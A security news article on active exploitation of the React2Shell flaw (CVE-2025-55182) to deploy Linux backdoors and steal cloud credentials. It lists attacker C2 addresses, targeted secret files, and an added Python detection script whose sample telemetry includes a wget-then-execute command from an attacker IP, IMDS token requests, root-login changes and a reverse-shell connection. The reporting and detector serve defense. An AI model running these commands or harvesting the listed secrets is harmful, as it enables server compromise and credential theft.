React2Shell Vulnerability Actively Exploited to Deliver Linux Backdoors
The security issue referred to as React2Shell is actively abused by threat actors as an initial access vector to push malware families like KSwapDoor and ZnDoor, based on analysis from Palo Alto Networks Unit 42 and NTT Security.
“KSwapDoor is a professionally developed remote access tool built for stealthy, long‑term access,” Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement.
“It establishes an internal mesh across compromised servers so they can relay traffic for one another and work around network controls. It relies on strong encryption to obfuscate C2 traffic and includes a ‘sleeper’ mode that lets operators keep it dormant behind firewalls until it’s reactivated using a covert trigger.”
The cybersecurity company noted that the malware had earlier been incorrectly labeled as BPFDoor, and clarified that this Linux backdoor supports interactive shells, arbitrary command execution, file management, and network scanning for lateral movement. It also masquerades as a legitimate Linux kernel swap daemon to blend into normal host activity and avoid basic detections.
In parallel, NTT Security said that organizations in Japan are facing campaigns that abuse React2Shell to deploy ZnDoor, a malware strain assessed to have been active in the wild since December 2023. The observed kill chains run a bash one‑liner that retrieves the payload from a remote server (45.76.155[.]14) using wget and then executes it.
This remote access trojan then connects back to the same attacker‑controlled infrastructure to receive tasking and execute it on the compromised host. Supported commands include, but are not limited to, the following:
- shell, to execute a single command
- interactive_shell, to start an interactive shell session
- explorer, to enumerate directory contents
- explorer_cat, to read and print a file
- explorer_delete, to remove a file
- explorer_upload, to pull a file from the C2 server to the host
- explorer_download, to exfiltrate files from the host to the C2 server
- system, to collect system inventory data
- change_timefile, to modify file timestamps (anti‑forensics)
- socket_quick_startstreams, to spin up a SOCKS5 proxy
- start_in_port_forward, to initiate port forwarding
- stop_in_port, to terminate port forwarding
This activity is unfolding while the vulnerability, cataloged as CVE-2025-55182 (CVSS score: 10.0), is being leveraged by multiple threat clusters. Google has identified at least five China‑nexus groups operationalizing the exploit chain to deploy a range of tooling and payloads:
- UNC6600, deploying a tunneling utility named MINOCAT
- UNC6586, deploying a downloader known as SNOWLIGHT
- UNC6588, deploying a backdoor referred to as COMPOOD
- UNC6603, deploying a newer Go backdoor variant called HISONIC that relies on Cloudflare Pages and GitLab to retrieve encrypted configuration data and blend its network traffic with legitimate services
- UNC6595, deploying a Linux build of ANGRYREBEL (aka Noodle RAT)
Microsoft, in its own advisory for CVE-2025-55182, stated that threat actors are using the bug to run arbitrary commands in post‑exploitation stages. Observed behavior includes establishing reverse shells to known Cobalt Strike infrastructure, deploying remote monitoring and management (RMM) agents such as MeshAgent, modifying the authorized_keys file, and enabling direct root logins.
Payloads seen in these operations include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. From a SOC perspective, the intrusions are notable for their use of Cloudflare Tunnel endpoints (“*.trycloudflare.com”) to bypass perimeter controls, followed by in‑environment reconnaissance to map assets, move laterally, and harvest credentials.
According to Microsoft, the credential theft phase targets Azure Instance Metadata Service (IMDS) endpoints across Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud to obtain identity tokens that can be used to deepen access into cloud estates.
“Attackers also deployed secret discovery tools such as TruffleHog and Gitleaks, along with custom scripts to extract several different secrets,” the Microsoft Defender Security Research Team said. “We additionally observed attempts to obtain AI- and cloud‑native credentials, such as OpenAI API keys, Databricks tokens, and Kubernetes service‑account credentials. Azure Command-Line Interface (CLI) (az) and Azure Developer CLI (azd) were also abused to acquire tokens.”
In a separate campaign documented by Beelzebub, threat actors are exploiting weaknesses in Next.js, including CVE-2025-29927 and CVE-2025-66478 (the same React2Shell vulnerability before it was marked as a duplicate), to systematically pull credentials and other sensitive artifacts, such as:
- .env, .env.local, .env.production, .env.development
- System environment variables (printenv, env)
- SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519, /root/.ssh/*)
- Cloud credentials (~/.aws/credentials, ~/.docker/config.json)
- Git credentials (~/.git-credentials, ~/.gitconfig)
- Command history (last 100 commands from ~/.bash_history)
- System files (/etc/shadow, /etc/passwd)
The malware then establishes persistence to survive reboots, deploys a SOCKS5 proxy for covert traffic, opens a reverse shell to “67.217.57[.]240:888,” and installs a React scanner to search the internet for additional vulnerable targets, supporting automated propagation.
The operation, referred to as Operation PCPcat, is estimated to have already compromised 59,128 servers. “The campaign shows characteristics of large-scale intelligence operations and data exfiltration on an industrial scale,” the Italian company said.
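The post-exploitation behaviours reported above (the wget-then-execute one-liner, Cloudflare Tunnel endpoints, IMDS token requests, authorized_keys and root-login changes, and the reverse-shell endpoint) can be turned into simple host-telemetry triage. The following is an added example, not code from any of the vendors cited here; the log format and every log line are constructed, the two IP addresses are the defanged indicators quoted on this page, and only the well-known 169.254.169.254 metadata address and the GCP metadata hostname are matched.

```python
"""Tag constructed host telemetry lines with the React2Shell post-exploitation
behaviours described in the reporting above. Detection logic only."""
import re
from typing import Iterable

# Indicators quoted on the page, with the defanging brackets removed.
REPORTED_C2 = {"45.76.155.14", "67.217.57.240"}
C2_RE = re.compile(r"\b(" + "|".join(map(re.escape, sorted(REPORTED_C2))) + r")\b")
# Link-local IMDS address shared by Azure, AWS and GCP, plus the GCP hostname.
IMDS_RE = re.compile(r"\b(169\.254\.169\.254|metadata\.google\.internal)\b")
TUNNEL_RE = re.compile(r"[\w-]+\.trycloudflare\.com\b")
# Fetch with wget/curl followed by piping to a shell, chmod +x, or running from /tmp.
DOWNLOAD_EXEC_RE = re.compile(r"\b(wget|curl)\b.*(\|\s*(ba)?sh\b|chmod\s+\+x|;\s*/tmp/\S+)")
SSH_FILE_RE = re.compile(r"(/\.ssh/authorized_keys|/etc/ssh/sshd_config)")
ROOT_LOGIN_RE = re.compile(r"PermitRootLogin\s+yes", re.I)

# Constructed telemetry in a made-up "KIND key=value ..." format.
SAMPLE_TELEMETRY = [
    "EXEC host=web01 cmd=wget http://45.76.155.14/zn -O /tmp/zn; chmod +x /tmp/zn; /tmp/zn",
    "DNS  host=web01 query=steady-harbor-example.trycloudflare.com",
    "HTTP host=web01 dst=169.254.169.254 path=/metadata/identity/oauth2/token",
    "FILE host=web01 op=write path=/root/.ssh/authorized_keys",
    "FILE host=web01 op=write path=/etc/ssh/sshd_config content=PermitRootLogin yes",
    "NET  host=web01 dst=67.217.57.240:888 proto=tcp",
    "EXEC host=web02 cmd=curl -s https://registry.npmjs.org/react | head",
    "HTTP host=web02 dst=10.0.0.5 path=/healthz",
]

def classify(line: str) -> list[str]:
    """Return the behaviour tags that fire on one telemetry line (may be empty)."""
    tags = []
    if C2_RE.search(line):
        tags.append("reported-c2")
    if TUNNEL_RE.search(line):
        tags.append("cloudflare-tunnel")
    if DOWNLOAD_EXEC_RE.search(line):
        tags.append("download-and-execute")
    if IMDS_RE.search(line):
        tags.append("imds-credential-access")
    if SSH_FILE_RE.search(line) or ROOT_LOGIN_RE.search(line):
        tags.append("ssh-persistence")
    return tags

def triage(lines: Iterable[str]) -> dict[str, list[str]]:
    """Bucket telemetry lines by behaviour tag; lines raising nothing are dropped."""
    hits: dict[str, list[str]] = {}
    for line in lines:
        for tag in classify(line):
            hits.setdefault(tag, []).append(line)
    return hits

if __name__ == "__main__":
    for tag, lines in triage(SAMPLE_TELEMETRY).items():
        print(f"{tag}: {len(lines)} line(s)")
```

A single benign line never fires; the interesting signal for a SOC is one host raising several of these tags in a short window, as in the web01 lines above.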
The Shadowserver Foundation is currently tracking more than 111,000 IPs exposed to React2Shell exploitation, including over 77,800 instances in the U.S., followed by Germany (7,500), France (4,000), and India (2,300). GreyNoise data indicates 547 malicious IPs from the U.S., India, the U.K., Singapore, and the Netherlands were actively participating in exploitation attempts over the last 24 hours.